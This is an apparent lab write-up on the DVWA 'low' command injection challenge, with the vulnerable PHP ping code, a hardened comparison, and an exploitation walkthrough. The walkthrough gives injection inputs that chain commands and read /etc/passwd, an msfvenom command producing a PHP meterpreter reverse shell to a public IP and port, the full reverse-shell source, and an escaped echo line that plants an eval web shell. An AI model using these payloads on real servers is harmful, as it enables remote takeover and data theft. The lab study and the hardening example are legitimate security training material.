DVWA: Command Injection - low


Code:

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
	// Get input
	$target = $_REQUEST[ 'ip' ];

	// Determine OS and execute the ping command.
	if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
		// Windows
		$cmd = shell_exec( 'ping  ' . $target );
	}
	else {
		// *nix
		$cmd = shell_exec( 'ping  -c 4 ' . $target );
	}

	// Feedback for the end user
	$html .= "<pre>{$cmd}</pre>";
}

?>
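The sink in the code above, placed beside a hardened version of the same ping feature, as an added example that is not DVWA's code. The point it makes is that the low level glues $target straight onto a command line that /bin/sh (or cmd.exe) parses, so any shell metacharacter starts a second command; the hardened versions validate the value as an IP address first and then either quote it or avoid the shell entirely. Function names and the list of sample inputs are the example's own; the first payload is the post's Windows line and the others are the POSIX sh equivalents.

```php
<?php
// Added example, not DVWA's code: the 'low' sink beside a hardened version of the same
// feature. Function names and the sample inputs are this example's own.

// The vulnerable construction (the *nix branch above): the target is glued onto a
// command line that /bin/sh will parse, so a shell metacharacter starts a second command.
function ping_command_low(string $target): string
{
    return 'ping -c 4 ' . $target;
}

// Hardened: accept only a syntactically valid IPv4/IPv6 address and reject everything
// else, then quote it so the shell sees exactly one literal word. Validation is the
// primary control: escapeshellarg() alone would pass "127.0.0.1&copy nul shell.php" to
// ping as a single quoted word (which ping cannot resolve) but would still hand a value
// such as "-f" to ping as an option, which quoting cannot prevent.
function ping_command_hardened(string $target): ?string
{
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return 'ping -c 4 ' . escapeshellarg($target);   // single quotes on Linux
}

// Best: no shell at all. proc_open() accepts an argv array (PHP >= 7.4), so the target
// reaches ping as one argument and is never text for sh or cmd.exe to parse. The same
// validation still applies because ping parses its own options.
function ping_argv(string $target): ?array
{
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return ['ping', '-c', '4', $target];   // e.g. proc_open(ping_argv($t), $spec, $pipes)
}

$inputs = [
    '127.0.0.1',                          // intended use
    '127.0.0.1&copy nul shell.php',       // the post's Windows payload
    '127.0.0.1; id',                      // POSIX sh equivalents
    '127.0.0.1 | cat /etc/passwd',
    '-f',                                 // argument injection, not command injection
];
foreach ($inputs as $in) {
    $argv = ping_argv($in);
    printf("%-30s low:      %s\n", $in, ping_command_low($in));
    printf("%-30s hardened: %s\n", '', ping_command_hardened($in) ?? 'rejected');
    printf("%-30s argv:     %s\n", '', $argv === null ? 'rejected' : implode(' ', $argv));
}
```

Only the first input survives the hardened functions; every other line is rejected before any command is built. Note that escapeshellarg() behaves differently on Windows (it wraps the value in double quotes and replaces double quotes, percent signs and exclamation marks with spaces), which is one more reason to rely on the IP validation rather than on quoting.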

Exploitation:

  • On Windows: 1. Create the PHP file

127.0.0.1&copy nul shell.php

As the screenshot shows, the file is created: cmd.exe treats & as a command separator, so copy nul shell.php runs after the ping and leaves an empty file in the directory the vulnerable script runs from.

2. Write the reverse-shell code into the PHP file. First generate the PHP code with Metasploit:

msfvenom -p php/meterpreter/reverse_tcp lhost=8.142.189.231 lport=4444 -o shell.php

Reverse shell code (the msfvenom output):

/*<?php /**/ error_reporting(0); $ip = '8.142.189.231'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Then run the injection to write the code above into the PHP file:

127.0.0.1&echo /*<?php /**/ error_reporting(0); $ip = '8.142.189.231'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); >shell.php

Note: written like this it will never succeed, because the payload contains characters that cmd.exe interprets itself (& | < > ^ ( )): the < in <?php becomes an input redirection and the && inside the code starts yet another command. Each of them has to be escaped by putting a ^ in front of it first!!! So write a simpler one instead; the one above is far too long to escape by hand...

echo ^<?php @eval^($_POST^['test'^]^); ?^> > shell.php

So, probably, presumably, it got written!!! (The echo goes after the same 127.0.0.1& prefix as in the earlier steps; on its own, without the separator, the > would just redirect ping's output into the file.)


Judging from this elegant URL, I'd guess the path is: www/DVWA/vulnerabilities/exec/shell.php (the file was written relative to the working directory of the vulnerable script, so it is served from the same directory as the exec page).

Connected...

  • On Linux:

Apart from chaining it with other vulnerabilities, I really don't know how to exploit this? (On Linux shell_exec() hands the string to /bin/sh -c, so the same injection works with ; | && or a newline as the separator, and the second command's output comes back inside the <pre> block.)